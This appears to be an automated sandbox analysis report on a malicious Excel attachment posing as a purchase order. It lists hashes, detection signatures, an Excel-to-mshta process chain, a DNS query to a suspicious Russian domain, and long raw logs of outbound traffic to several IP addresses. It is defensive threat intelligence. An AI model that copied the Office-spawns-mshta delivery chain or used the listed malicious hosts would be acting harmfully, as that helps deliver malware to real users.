Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
PO#4500550389.xla.xlsx

Overview

General Information

Sample name:PO#4500550389.xla.xlsx
Analysis ID:1640393
MD5:f871e42b797cf70e3ee4a79e21f02197
SHA1:b03ebab29eab8c27f1a814494953147a9b90322f
SHA256:ecc360802ade998b33380472d1b5ce4dc95e4039daf93123ba3885e2716dc012
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6784 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 6032 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 6456 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2376 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6784, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 6032, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.225.72.170, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6784, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6784, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-17T09:29:23.704196+010020283713Unknown Traffic192.168.2.74970113.107.246.60443TCP
2025-03-17T09:29:30.560221+010020283713Unknown Traffic192.168.2.74970413.107.246.60443TCP
2025-03-17T09:29:30.560706+010020283713Unknown Traffic192.168.2.74970313.107.246.60443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO#4500550389.xla.xlsxVirustotal: Detection: 33%Perma Link
Source: PO#4500550389.xla.xlsxReversingLabs: Detection: 19%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49701 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: kryx.ru
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
